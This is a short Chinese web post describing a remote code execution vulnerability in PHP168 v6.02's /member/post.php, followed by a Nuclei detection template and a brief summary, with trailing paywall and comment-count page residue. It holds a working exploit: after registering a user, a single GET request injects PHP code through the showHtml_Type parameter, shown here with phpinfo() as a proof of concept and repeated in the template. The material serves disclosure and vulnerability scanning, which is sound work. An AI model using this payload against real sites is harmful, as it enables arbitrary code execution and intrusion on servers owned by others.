漏洞利用
这个漏洞是在 /member/post.php 中存在一个代码执行漏洞
利用步骤:
1. 先注册一个用户
2.执行下面代码,get方式就可以了
http://targetURL/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML
利用Nuclei 进行检测这个漏洞
id: php168-v602
info:
name: php168-v6.02 - Remote Code Execution
author: dr_set
severity: high
description: PHP168 V6.02 has a remote code execution vulnerability.
reference: https://www.seebug.org/vuldb/ssvid-94372
tags: remote, code execution, php168, rce
requests:
- method: GET
path:
- "{
{BaseURL}}/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML"
# headers:
# Cookie: ${cookie}
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"

文章描述了一个存在于PHP168v6.02中的远程代码执行漏洞,利用步骤包括注册用户并发送特定GET请求。同时提到了可以使用Nuclei工具进行检测,给出了Nuclei模板示例,通过匹配PHP信息来确认漏洞存在。该漏洞的严重性被评为高。
最低0.47元/天 解锁文章
571

被折叠的 条评论
为什么被折叠?



